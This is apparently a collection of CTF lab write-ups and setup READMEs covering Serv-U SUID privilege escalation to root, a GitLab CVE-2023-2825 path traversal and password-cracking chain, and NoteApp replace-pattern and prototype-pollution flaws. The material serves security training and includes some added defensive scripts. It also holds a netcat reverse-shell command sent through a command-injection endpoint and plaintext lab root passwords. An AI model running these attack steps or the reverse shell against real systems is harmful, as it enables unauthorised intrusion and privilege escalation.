+ http://192.168.121.129/shimishao/admin/index.php (CODE:200|SIZE:8967)
==> DIRECTORY: http://192.168.121.129/shimishao/admin/js/
==> DIRECTORY: http://192.168.121.129/shimishao/admin/logs/
==> DIRECTORY: http://192.168.121.129/shimishao/admin/plugins/

```
In the output above, the shimishao/admin/logs directory stands out as useful to us.
Let's try to access it directly:

![Alt text](Screenshots/image-4.png)

We see a system.log file. Download it and look at what it contains.

![Alt text](Screenshots/image-5.png)

As seen above, the log gives us credentials for the Ubuntu user pred8or. Now we can use them to log in over SSH.

```
┌──(kali㉿kali)-[~]
└─$ ssh pred8or@192.168.121.129
pred8or@192.168.121.129's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

74 packages can be updated.
28 updates are security updates.

New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Tue Oct  3 03:42:01 2023 from 192.168.163.1
pred8or@shimishao:~$
```

In the home directory we find the user1.txt file. Reading it with cat user1.txt gives us the first flag.

```
pred8or@shimishao:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user1.txt  Videos
pred8or@shimishao:~$ cat user1.txt
ICSD{66d74978b307889bea234a4bc6570a36}

```

## Privilege Escalation
Privilege escalation is the process of going from lower permissions to higher ones. It is done by exploiting vulnerabilities, design flaws or misconfigurations in applications, and it is an important step of the attack chain.
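The misconfiguration exploited in this machine is an unexpected SUID binary, so the defender's counterpart to the enumeration below is a baseline check. As an added example that is not part of the original walkthrough, this POSIX shell script compares a SUID listing against an allowlist of the binaries a stock Ubuntu 18.04 install is expected to ship (the allowlist is an assumption for illustration) and flags anything else; the sample input is the list the walkthrough's find command printed.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: audit SUID binaries
# against an allowlist so that a third-party binary such as
# /usr/local/Serv-U/Serv-U is flagged instead of blending in with passwd,
# sudo and the other expected ones.

# Allowlist: SUID binaries a stock Ubuntu 18.04 install carries. This list is
# an assumption for illustration; build your own from a clean reference image.
SUID_ALLOWLIST="/usr/bin/arping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd"

# Constructed sample input: the output the walkthrough's find command produced.
SAMPLE_FIND_OUTPUT="/usr/bin/arping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U"

# collect_suid: the live equivalent of the sample (same find as the walkthrough).
collect_suid() {
    find / -perm -u=s -type f 2>/dev/null
}

# audit_suid LIST: print each path in LIST (one per line) that is not in the
# allowlist. Exit status 0 when nothing unexpected was found, 1 otherwise.
# The body runs in a subshell so the IFS change does not leak to the caller.
audit_suid() (
    IFS='
'
    unexpected=""
    for path in $1; do
        [ -n "$path" ] || continue
        # -F fixed string, -x whole line, -q quiet: exact path match only,
        # so /usr/bin/chsh does not match a hypothetical /usr/bin/chsh2
        if ! printf '%s\n' "$SUID_ALLOWLIST" | grep -Fxq -- "$path"; then
            unexpected="${unexpected}${path}
"
        fi
    done
    printf '%s' "$unexpected"
    [ -z "$unexpected" ]
)

# Stand-alone run on the constructed sample; on a real host pass "$(collect_suid)".
if report=$(audit_suid "$SAMPLE_FIND_OUTPUT"); then
    echo "no unexpected SUID binaries"
else
    echo "unexpected SUID binaries (review them, or drop the bit with chmod u-s):"
    echo "$report"
fi
```

Run it periodically (or from a file-integrity job) and treat any new line in the report as a change to investigate; an allowlist built from a clean image of the same release keeps the noise down.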

The following command enumerates all binaries that have the SUID bit set:

```
find / -perm -u=s -type f 2>/dev/null
```
```
pred8or@shimishao:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/arping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U


```

The output shows /usr/local/Serv-U/Serv-U with the SUID (set-user-ID) bit set. Let's search for known vulnerabilities in it.

![Alt text](Screenshots/image-6.png)

On Exploit-DB, "Serv-U FTP Server < 15.1.7 - Local Privilege Escalation" matches the vulnerable version.

https://www.exploit-db.com/exploits/47173

Let's exploit it:

We copy this bash script and run it from our home directory.

```
pred8or@shimishao:~$ ls
b.sh  Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user1.txt  Videos
pred8or@shimishao:~$ bash b.sh
[*] Launching Serv-U ...
sh: 1: : Permission denied
[+] Success:
-rwsr-xr-x 1 root root 1113504 Oct  6 07:12 /tmp/sh
[*] Launching root shell: /tmp/sh
sh-4.4# whoami
root
sh-4.4# cd /root
sh-4.4# ls
root.txt
sh-4.4# cat root.txt
ICSD{45caa8f3afa6fc94aa3c039ceeeb7883}
sh-4.4#
```

--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/README.md:
--------------------------------------------------------------------------------
# Setup

1. Use the installation link to download the .ova file.
2. Import the image file into VMware using File -> Open

> [!WARNING]
> The images are not supported by VirtualBox.

3. Choose a virtual machine name and location for the new VM.
4. The default network interface is configured as NAT. If it is not, set it to NAT.
5. You can find the IP address of the machine with arp-scan from your Kali machine.
```
┌──(kali㉿kali)-[~/Captivity]
└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ee:f4:ad, IPv4: 192.168.100.132
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1   00:50:56:c0:00:08   VMware, Inc.
192.168.100.2   00:50:56:e5:ad:c6   VMware, Inc.
192.168.100.130 00:0c:29:94:0e:fd   VMware, Inc.
192.168.100.254 00:50:56:fa:13:b9   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.303 seconds (111.16 hosts/sec). 4 responded
```
6. If something goes wrong, use the credentials provided below to access the machine.

# Credentials
```
Administrator:gnE4ZqIYDxX78uPek1Xo
```
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Gitlab/README.md:
--------------------------------------------------------------------------------
# Setup

1. Use the installation link to download the .ova file.
2. Import the image file into VMware using File -> Open.

![Alt text](Screenshots/image-1.png)

> [!WARNING]
> The images are not supported by VirtualBox.

3. Choose a virtual machine name and location for the new VM.
4. The network interface should be configured as NAT (the default). If it is not, change it.
5. Find the machine's IP address with arp-scan from your Kali machine.
```
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.121.1    00:50:56:c0:00:08    VMware, Inc.
192.168.121.2    00:50:56:f2:3b:82    VMware, Inc.
192.168.121.129  00:0c:29:c7:d8:5e    VMware, Inc.
192.168.121.254  00:50:56:e4:f5:4c    VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded

┌──(kali㉿kali)-[~]
└─$ ssh root@192.168.121.129
root@192.168.121.129's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

74 packages can be updated.
28 updates are security updates.

New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Fri Oct  6 04:20:37 2023 from 192.168.121.128
root@shimishao:~#
```

6. If something goes wrong, use the credentials provided below to access the machine.
# Credentials
```
root:1a@S3d$FZ
```
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Gitlab/Walkthrough.md:
--------------------------------------------------------------------------------
# Gitlab

## High Level Overview

GitLab is a high-level Linux machine with several vulnerabilities that, chained together, give us root access to the system. The site's robots.txt file reveals a list of passwords, which can be used to brute-force the login page as the root user. Once logged in, we find that the instance runs GitLab 16.0.0, which is vulnerable to arbitrary file read. Reading /etc/passwd shows that the password hash of the plumber user is stored there. Cracking this hash with `john` gives us the password, and we connect to the host over SSH. A misconfigured SUID `pax` binary lets us read the app.py file under /root, and a crafted curl request to the service it runs gives us an elevated shell.

# Recon

Nmap finds 2 open TCP ports: SSH and HTTPS.

![https://i.ibb.co/jHLqK8r/Nmap.png](https://i.ibb.co/jHLqK8r/Nmap.png)

## Site

The website runs GitLab Enterprise Edition.

![https://i.ibb.co/tMFYjKF/Sign-in-Page.png](https://i.ibb.co/tMFYjKF/Sign-in-Page.png)

Let’s enumerate hidden files and folders with `Gobuster`.
![https://i.ibb.co/YDwSLGb/Gobuster.png](https://i.ibb.co/YDwSLGb/Gobuster.png)

The site has a robots.txt file, and it appears to contain password candidates for logging in.

![https://i.ibb.co/p39qHzw/Robots-txt.png](https://i.ibb.co/p39qHzw/Robots-txt.png)

The default user for GitLab Enterprise Edition is root.

Let’s use Burp Suite to brute-force this user's password with that list.

![https://i.ibb.co/QHRx7Fg/Root-Password.png](https://i.ibb.co/QHRx7Fg/Root-Password.png)

We found the credentials for the root user in GitLab.

The GitLab version is shown in the help menu.

![https://i.ibb.co/0Jkm4Gn/Gitlab-Version.png](https://i.ibb.co/0Jkm4Gn/Gitlab-Version.png)

GitLab 16.0.0 is vulnerable to path traversal; the associated CVE is CVE-2023-2825.

The PoC can be found here:

[https://github.com/Occamsec/CVE-2023-2825/blob/main/poc.py](https://github.com/Occamsec/CVE-2023-2825/blob/main/poc.py)

Set the endpoint, username and password at the top of the script before running it.

```python
ENDPOINT = "https://gitlab.icsd"
USERNAME = "root"
PASSWORD = "Shadow123123"
```

The output of the Python script:

```console
─# python3 poc.py
[*] Attempting to login...
[*] Login successful as user 'root'
[*] Creating 11 groups with prefix 469
[*] Created group '469-1'
[*] Created group '469-2'
[*] Created group '469-3'
[*] Created group '469-4'
[*] Created group '469-5'
[*] Created group '469-6'
[*] Created group '469-7'
[*] Created group '469-8'
[*] Created group '469-9'
[*] Created group '469-10'
[*] Created group '469-11'
[*] Created public repo '/469-1/469-2/469-3/469-4/469-5/469-6/469-7/469-8/469-9/469-10/469-11/CVE-2023-2825'
[*] Uploaded file '/uploads/2a9cdef69c9b1db6ce7fc909a96cb11f/file'
[*] Executing exploit, fetching file '/etc/passwd': GET - //469-1/469-2/469-3/469-4/469-5/469-6/469-7/469-8/469-9/469-10/469-11/CVE-2023-2825/uploads/2a9cdef69c9b1db6ce7fc909a96cb11f//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
plumber:$y$j9T$Q60srmF7j7UmqQhxTU2/p.$x2mfeh7AqyZr2sAcIT9LTXTEhVIbJ3Oians4wDJdin/:1000:1000:plumber:/home/plumber:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
gitlab-www:x:998:999::/var/opt/gitlab/nginx:/bin/false
git:x:997:998::/var/opt/gitlab:/bin/sh
gitlab-redis:x:996:997::/var/opt/gitlab/redis:/bin/false
gitlab-psql:x:995:996::/var/opt/gitlab/postgresql:/bin/sh
registry:x:994:995::/var/opt/gitlab/registry:/bin/sh
```

The password hash of the plumber user is stored directly in the `/etc/passwd` file (in the second field, which normally holds `x` while the hash lives in `/etc/shadow`). Let’s crack it with the following `john` command.

```sh
john --format=crypt hash.txt
```

![https://i.ibb.co/18jP5w1/password-found.png](https://i.ibb.co/18jP5w1/password-found.png)

With these credentials, we can SSH in as the "plumber" user.

![https://i.ibb.co/5Fzy4D5/SSH-TO-PLUMBER.png](https://i.ibb.co/5Fzy4D5/SSH-TO-PLUMBER.png)

Let’s list the listening ports with the following command.
```sh
netstat -tulnp
```

![https://i.ibb.co/y403JCB/netstat-tools.png](https://i.ibb.co/y403JCB/netstat-tools.png)

Let’s send a curl request to the local port 10080.

```console
plumber@plumber:~$ curl 127.0.0.1:10080
Cannot resolve GET request
plumber@plumber:~$
```

Let’s change the HTTP method to POST.

```console
plumber@plumber:~$ curl -XPOST 127.0.0.1:10080



TypeError: expected str, bytes or os.PathLike object, not NoneType
.....
SHORTENED
.....
<div class="plain">
  <p>
    This is the Copy/Paste friendly version of the traceback.
  </p>
  <textarea cols="50" rows="10" name="code" readonly>Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2213, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2193, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2190, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1486, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1484, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1469, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
  File "/root/webapp/app.py", line 13, in index
    print("User Input:", os.system(user_input))
TypeError: expected str, bytes or os.PathLike object, not NoneType
</textarea>
</div>
<div class="explanation">
  The debugger caught an exception in your WSGI application. You can now
  look at the traceback which led to the error.  <span class="nojavascript">
  If you enable JavaScript you can also use additional features such as code
  execution (if the evalex feature is enabled), automatic pasting of the
  exceptions and much more.</span>
</div>
<div class="footer">
  Brought to you by <strong class="arthur">DON'T PANIC</strong>, your
  friendly Werkzeug powered traceback interpreter.
</div>
</div>

<div class="pin-prompt">
  <div class="inner">
    <h3>Console Locked</h3>
    <p>
      The console is locked and needs to be unlocked by entering the PIN.
      You can find the PIN printed out on the standard output of your
      shell that runs the server.
    <form>
      <p>PIN:
        <input type=text name=pin size=14>
        <input type=submit name=btn value="Confirm Pin">
    </form>
  </div>
</div>
</body>
</html>

<!--

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2213, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2193, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2190, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1486, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1484, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1469, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
  File "/root/webapp/app.py", line 13, in index
    print("User Input:", os.system(user_input))
TypeError: expected str, bytes or os.PathLike object, not NoneType

-->
plumber@plumber:~$
```

The traceback shows that this simple HTTP service is served from `/root/webapp/app.py`, and that it runs with the Werkzeug debugger enabled. However, we have no access to the /root folder.

Enumeration is the key.

Searching for SUID files, we find that the `pax` command has the SUID bit set, which we can abuse to read files we otherwise cannot.

```sh
LFILE=file_to_read
pax -w "$LFILE"
```

Pointing `LFILE` at app.py prints the file (pax writes a tar archive to stdout, so an archive header precedes the source).

```console
plumber@plumber:~$ LFILE="/root/webapp/app.py"
pax -w "$LFILE"
/root/webapp/app.py010064400000000000000000000011111450271307700132670ustar00rootrootfrom flask import Flask, request, render_template
import os

app = Flask(__name__)

# Define the route for the home page
@app.route('/', methods=['GET','POST'])
def index():
    if request.method == 'POST':
        # Get the user input from the form
        user_input = request.form.get('user_input')
        # Print the user input to the console
        print("User Input:", os.system(user_input))
    elif request.method == 'GET':
        return "Cannot resolve GET request"

    # return render_template('index.html')

if __name__ == '__main__':
    app.run(debug=True, port=10080)
plumber@plumber:~$
```

The following command can be used to get a reverse shell.

```console
plumber@plumber:~$ curl -XPOST localhost:10080 -d "user_input=busybox nc 192.168.47.128 12342 -e sh"
```

![https://i.ibb.co/nMqKpjx/last.png](https://i.ibb.co/nMqKpjx/last.png)

Thank you for reading!!
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/NoteApp/README.md:
--------------------------------------------------------------------------------
# Setup

1. Use the installation link to download the .ova file.
2. Import the image file into VMware using File -> Open.

![Alt text](Screenshots/image-1.png)

> [!WARNING]
> The images are not supported by VirtualBox.

3. Choose a virtual machine name and location for the new VM.
4. The network interface should be configured as NAT (the default). If it is not, change it.
5. Find the machine's IP address with arp-scan from your Kali machine.
```
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.121.1    00:50:56:c0:00:08    VMware, Inc.
192.168.121.2    00:50:56:f2:3b:82    VMware, Inc.
192.168.121.129  00:0c:29:c7:d8:5e    VMware, Inc.
192.168.121.254  00:50:56:e4:f5:4c    VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded

┌──(kali㉿kali)-[~]
└─$ ssh root@192.168.121.129
root@192.168.121.129's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

74 packages can be updated.
28 updates are security updates.

New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Fri Oct  6 04:20:37 2023 from 192.168.121.128
root@shimishao:~#
```

6. If something goes wrong, use the credentials provided below to access the machine.

# Credentials
```
root:Zold3kMnsn@M1n3
```
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/NoteApp/Walkthrough.md:
--------------------------------------------------------------------------------
# NoteApp

## High Level Overview

NoteApp is a high-level Linux machine with several vulnerabilities that, chained together, give us root access to the system. Analyzing the application's source code, we find that the GenerateNoteUrl() function passes user input straight into JavaScript's .replace() method, whose special replacement patterns let us reach hidden internal endpoints that are otherwise unreachable. From there, we discover that the /api/admin/create-admin-user endpoint is vulnerable to prototype pollution. We use it to create a user with admin privileges and then exploit an RCE in /api/admin/delete-profile-photo by simply supplying our reverse shell command. After getting a reverse shell as a normal user on the system, we find that rsync has the SUID bit set.
We use the SUID entry for this command in GTFOBins to obtain an elevated shell.

# Recon

Nmap finds 1 open TCP port: HTTP on 8080.

![https://i.ibb.co/bW3Svbh/nmap.png](https://i.ibb.co/bW3Svbh/nmap.png)

## Site

The site's root page (`/`) links to its GitHub source code.

![https://i.ibb.co/2gnJWVH/project-link.png](https://i.ibb.co/2gnJWVH/project-link.png)

![https://i.ibb.co/7Qhb74n/github-dev.png](https://i.ibb.co/7Qhb74n/github-dev.png)

Analyzing the web application's source code, we come across two main services, called ‘Gateway’ and ‘Internal’.

The ‘Internal’ service's port is only reachable from localhost; the local firewall blocks direct connections to it.

## GitHub Endpoints

### /sign-in and /sign-up

![https://i.ibb.co/sK1Ykx9/Gateway-Auth-Route.png](https://i.ibb.co/sK1Ykx9/Gateway-Auth-Route.png)

As its name suggests, the ‘Gateway’ service acts as a gateway between the ‘Internal’ service and the NoteApp user.

We can register and log in, and then send requests to the endpoints below.
![https://i.ibb.co/1dPKRQg/Gateway-User-route.png](https://i.ibb.co/1dPKRQg/Gateway-User-route.png)

### Sign-Up request in BurpSuite

```http
POST /sign-up HTTP/1.1
Host: noteapp.icsd:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 95

{"email": "huseyn.aghazada@prosol.az","username":"huseyna12","password":"hehehe12","age": 12
}
```

![https://i.ibb.co/PDmpYC4/Sign-In-Request.png](https://i.ibb.co/PDmpYC4/Sign-In-Request.png)

### Sign-In request in BurpSuite

```http
POST /sign-in HTTP/1.1
Host: noteapp.icsd:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 62

{"email": "huseyn.aghazada@prosol.az","password":"hehehe12"
}
```

![https://i.ibb.co/zJ8YmsB/Sign-In-Request.png](https://i.ibb.co/zJ8YmsB/Sign-In-Request.png)

### GenerateNoteUrl

This URL generator function directly uses JavaScript's `.replace()` method on its input.

![https://i.ibb.co/YQX1x4N/Gateway-User-Controller-Bypass-Gateway.png](https://i.ibb.co/YQX1x4N/Gateway-User-Controller-Bypass-Gateway.png)

Looking up the `.replace()` method of JS shows that it accepts a `RegExp` object or a string as the pattern, and that the replacement string is not inserted literally: certain `$` sequences in it have special meaning.
![https://i.ibb.co/3rQ3Vh3/String-Replace.png](https://i.ibb.co/3rQ3Vh3/String-Replace.png)

Let’s put these things together.

```js
const noteUrl = `${base_url}method-user-note/:NoteId:/`;

const GenerateNoteUrl = (method, NoteId) => {
  return noteUrl.replace('method', method).replace(':NoteId:', NoteId);
};
```

The `method` argument of the first `replace()` cannot be controlled directly by the attacker, but the `NoteId` in the second one is user input. Therefore, let’s look at the second `.replace()`.

As the MDN [documentation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace) explains, putting `$'` in the NoteId input makes `.replace()` insert the portion of the string that follows the matched substring (`:NoteId:`), which here is `/`.

For simplicity, I used the following node script.

```js
const noteUrl = 'http://localhost/:8080/get-user-note/:NoteId:/';
const USERINPUT = `huseyn$'aghazada`;
// "$'" expands to the text after the match ("/"), so the id becomes huseyn/aghazada
console.log(noteUrl.replace(':NoteId:', USERINPUT));
```

![https://i.ibb.co/VYgHZbZ/personal-node-for-replace.png](https://i.ibb.co/VYgHZbZ/personal-node-for-replace.png)

This means we can send requests directly to hidden `Internal` service endpoints, such as the `/first_flag` endpoint that I added.

![https://i.ibb.co/5knnnKK/first-flag.png](https://i.ibb.co/5knnnKK/first-flag.png)

![https://i.ibb.co/LzGYwGF/Delete-request.png](https://i.ibb.co/LzGYwGF/Delete-request.png)

After successfully retrieving the first flag, we can go for the second flag.

The image above of the ./internal/app.js file also shows that a `_method=METHOD` query parameter overrides the HTTP method that is forwarded to the Internal service.
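To see the `$'` behaviour end to end, here is an added example; it is not code from the NoteApp project or from the walkthrough. It builds the URL the way `GenerateNoteUrl` does, shows how an HTTP client would resolve the resulting path, and contrasts it with a version that validates `NoteId` and passes a function as the replacement, so `$` sequences are never expanded. The `base_url` value is assumed; the real one is not shown on the page.

```javascript
// Added example (not from the NoteApp source): why "$'" in a NoteId reaches
// other Internal endpoints, and a GenerateNoteUrl that does not expand it.
// base_url is an assumed value; the real one is not shown in the walkthrough.
const base_url = 'http://internal.local:3000/api/';
const noteUrl = `${base_url}method-user-note/:NoteId:/`;

// Shape of the page's function: NoteId is user input passed straight to replace().
const GenerateNoteUrl = (method, NoteId) =>
  noteUrl.replace('method', method).replace(':NoteId:', NoteId);

// Hardened version: accept only a plain identifier, and pass a function as the
// replacement so that "$'", "$`", "$&" and "$n" are inserted literally.
const NOTE_ID = /^[A-Za-z0-9_-]{1,64}$/;
const SafeGenerateNoteUrl = (method, NoteId) => {
  if (typeof NoteId !== 'string' || !NOTE_ID.test(NoteId)) {
    throw new Error('invalid NoteId');
  }
  return noteUrl.replace('method', () => method).replace(':NoteId:', () => NoteId);
};

// Resolve the way an HTTP client or server would, collapsing ".." segments.
const resolvedPath = (url) => new URL(url).pathname;

// Constructed inputs: the walkthrough's payload shape and a benign id.
const payload = "..$'..$'admin$'create-admin-user";
console.log(GenerateNoteUrl('get', payload));
console.log(resolvedPath(GenerateNoteUrl('get', payload)));
console.log(SafeGenerateNoteUrl('get', 'abc123'));
```

Run it with `node`. The first line prints `.../get-user-note/../../admin/create-admin-user/`, because each `$'` became the `/` that follows `:NoteId:`; the resolved path is `/admin/create-admin-user/`, which is why the request escapes the note endpoint. The function replacer is the part that closes the hole; the identifier check is defence in depth against other surprises in ids.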
Verifying this:

![https://i.ibb.co/bJ2bS6f/Method-override-checking.png](https://i.ibb.co/bJ2bS6f/Method-override-checking.png)

We can successfully override the method with the *_method* query parameter.

### Prototype Pollution

From the code in `AdminController.js`, we can create an admin user by exploiting prototype pollution.

```js
exports.CreateAdminUser = (req, res) => {
  const errors = validationResult(req);
  if (!errors.isEmpty()) {
    return res.status(400).json({ errors: errors.array() });
  }
  const user = req.body;

  if (user.isAdmin && user.SecretCode !== SecretCode) {
    return res.status(401).json({ message: 'No Admin User is created!!!' });
  }
  else {
    let NewUser = Object.assign(DefaultUser, user);
    if (NewUser.isAdmin) {
      bcrypt.hash(NewUser.password, 10, (err, hashedPassword) => {
        if (err) {
          return res.status(500).json({ message: 'Error hashing password' });
        }

        AdminUser.findByUsername(NewUser.username, (existingAdminUserByUsername) => {
          if (existingAdminUserByUsername) {
            return res.status(400).json({ message: 'Username is already taken' });
          }
          AdminUser.create(NewUser.username, hashedPassword, (adminId) => {
            return res.status(201).json({ message: 'Admin User is successfully created', adminId });
          });
        });
      });
    }
    else {
      return res.status(401).json({ message: 'No Admin User is created!!!' });
    }
  }
};
```

Two things go wrong here. `Object.assign(DefaultUser, user)` has its arguments in the wrong order: the shared `DefaultUser` object is the target, so it is modified and keeps the change for later requests. And `req.body` is assigned to `user` without any filtering, so a `__proto__` key in the JSON body is copied along with the rest.
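The following added example (not the project's code) reduces `CreateAdminUser` to the part that decides `isAdmin`, reproduces the `__proto__` body used in this walkthrough's request, and shows a version that copies only allowlisted fields. `DefaultUser` is not shown on the page; it is assumed here to hold only `username` and `password`, and `SecretCode` is a constructed value.

```javascript
// Added example (not the NoteApp project's code): the CreateAdminUser logic
// from the walkthrough, reduced to what decides isAdmin, beside a safe version.
// DefaultUser's real shape is not shown on the page; it is assumed here to
// carry only username and password. SecretCode is a constructed value.
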